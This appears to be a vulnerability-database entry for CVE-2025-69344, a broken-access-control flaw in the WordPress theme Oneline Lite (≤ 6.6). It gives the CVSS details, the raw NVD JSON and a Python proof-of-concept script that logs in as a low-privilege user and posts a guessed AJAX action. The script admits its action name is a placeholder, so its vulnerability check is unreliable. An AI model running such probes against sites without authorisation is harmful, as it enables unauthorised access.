Security Vulnerability Report
中文
CVE-2025-69344 CVSS 4.3 MEDIUM

CVE-2025-69344

Published: 2026-01-07 12:17:07
Last Modified: 2026-04-23 15:36:23

Description

Missing Authorization vulnerability in themehunk Oneline Lite oneline-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Oneline Lite: from n/a through <= 6.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Oneline Lite <= 6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69344 PoC - WordPress Oneline Lite Broken Access Control This PoC demonstrates the authorization bypass vulnerability in Oneline Lite theme. """ import requests import sys def check_vulnerability(target_url, username, password): """ Check if the target is vulnerable to CVE-2025-69344 """ # Setup WordPress session session = requests.Session() # WordPress login endpoint login_url = f"{target_url}/wp-login.php" # Login data login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } # Perform login try: login_response = session.post(login_url, data=login_data, timeout=10) # Check if login was successful if 'wordpress_logged_in' in str(session.cookies): print(f"[+] Login successful for user: {username}") # Try to access protected theme functionality # Common AJAX actions in Oneline Lite that might be unprotected ajax_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", ] for ajax_url in ajax_endpoints: # Example: Try common theme actions # Note: Actual action names need to be identified from theme code test_data = { 'action': 'oneline_lite_protected_action', 'nonce': '' } response = session.post(ajax_url, data=test_data, timeout=10) # If response indicates access without proper authorization if response.status_code == 200 and 'success' in response.text.lower(): print(f"[!] Potential vulnerability found at: {ajax_url}") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Login failed for user: {username}") return False except requests.RequestException as e: print(f"[-] Request error: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python3 {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python3 {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Testing CVE-2025-69344 on {target}") print(f"[*] Using low-privilege account: {user}") is_vulnerable = check_vulnerability(target, user, pwd) if is_vulnerable: print("\n[+] Target is VULNERABLE to CVE-2025-69344") else: print("\n[-] Target may not be vulnerable or PoC needs adjustment")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69344", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:06.557", "lastModified": "2026-04-23T15:36:22.683", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themehunk Oneline Lite oneline-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Oneline Lite: from n/a through <= 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/oneline-lite/vulnerability/wordpress-oneline-lite-theme-6-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}